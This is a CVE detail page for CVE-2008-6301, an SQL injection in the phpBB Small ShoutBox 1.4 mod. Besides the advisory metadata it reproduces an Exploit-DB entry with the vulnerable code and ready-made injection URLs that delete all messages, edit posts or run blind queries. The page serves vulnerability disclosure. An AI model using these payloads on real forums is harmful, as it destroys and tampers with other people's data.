CVE-2008-6301 Detail

CVE-2008-6301

CVE Descriptions

SQL injection vulnerability in shoutbox_view.php in the Small ShoutBox module 1.4 for phpBB allows remote attackers to execute arbitrary SQL commands via the id parameter in a delete action.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-89	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	7.5		AV:N/AC:L/Au:N/C:P/I:P/A:P	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 6995

Publication date : 2008-11-04 23h00 +00:00
Author : StAkeR
EDB Verified : Yes

/* -------------------------------------------------------------- phpBB Mod Small ShoutBox 1.4 Remote Edit/Delete Messages Vuln -------------------------------------------------------------- Discovered By StAkeR[at]hotmail[dot]it Download On http://www.phpbbhacks.com/load.php?id=1595 NOTE: Works Regardless PHP.ini Settings! Thanks darkjoker -------------------------------------------------------------- File (shoutbox_view.php) 50. $id = ( isset($HTTP_GET_VARS['id']) ) ? $HTTP_GET_VARS['id'] : $HTTP_POST_VARS['id']; 168. if ( $mode == "delete" && $adel ) 169. { 170. $sql = "DELETE FROM " . SHOUTBOX_TABLE . " 171. WHERE id = $id $del_mod"; 172. if( !($result = $db->sql_query($sql)) ) 173. { message_die(GENERAL_ERROR, 'Could not delete shoutbox message', '', __LINE__, __FILE__, $sql); } 174. - Delete All Messages - shoutbox_view.php?mode=delete&id=-1 or 1=1/* - Edit Message / Post Message - shoutbox_view.php?mode=edit&id=-1 or 1=1/*&name_id=1 or 1=1/*&date_edit=1225915829&name_edit=[NICKNAME]&clean_msg=[MESSAGE] - Blind SQL Injection - phpBB2/shoutbox_view.php?mode=delete&id=[Query] */ # milw0rm.com [2008-11-05]

Products Mentioned

Configuraton 0

Prezmo>>Small_shoutbox >> Version 1.4

Phpbb>>Phpbb >> Version *

Phpbb>>Phpbb >> Version - (Open CPE detail)
Phpbb>>Phpbb >> Version 1.4.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.0.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.0.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.0.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.0.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.0.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.0.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.0.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.0.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.0.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.0.1 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.0.2 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.0.3 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.0.4 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.0.5 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.0.6 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.0.7 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.0.8 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.0.9 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.0.10 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.0.11 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.0.12 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.0.13 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.1 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.2 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.3 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.3 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.4 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.5 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.6 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.7 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.7 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.8 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.9 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.10 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.1.11 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.1 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.2 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.3 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.3 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.3 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.4 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.4 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.5 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.5 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.5 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.6 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.6 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.6 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.7 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.8 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.10 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.2.11 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.3.0 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.3.1 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.3.2 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.3.2 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.3.3 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.3.3 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.3.4 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.3.4 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.3.5 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.3.5 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.3.6 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.3.6 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.3.7 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.3.8 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.3.8 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.3.9 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.3.9 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.3.10 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.3.10 (Open CPE detail)
Phpbb>>Phpbb >> Version 3.3.11 (Open CPE detail)

References

https://exchange.xforce.ibmcloud.com/vulnerabilities/46389
Tags : vdb-entry, x_refsource_XF

https://www.exploit-db.com/exploits/6995
Tags : exploit, x_refsource_EXPLOIT-DB

http://secunia.com/advisories/32565
Tags : third-party-advisory, x_refsource_SECUNIA

http://www.securityfocus.com/bid/32123
Tags : vdb-entry, x_refsource_BID

CVE-2008-6301 : Detail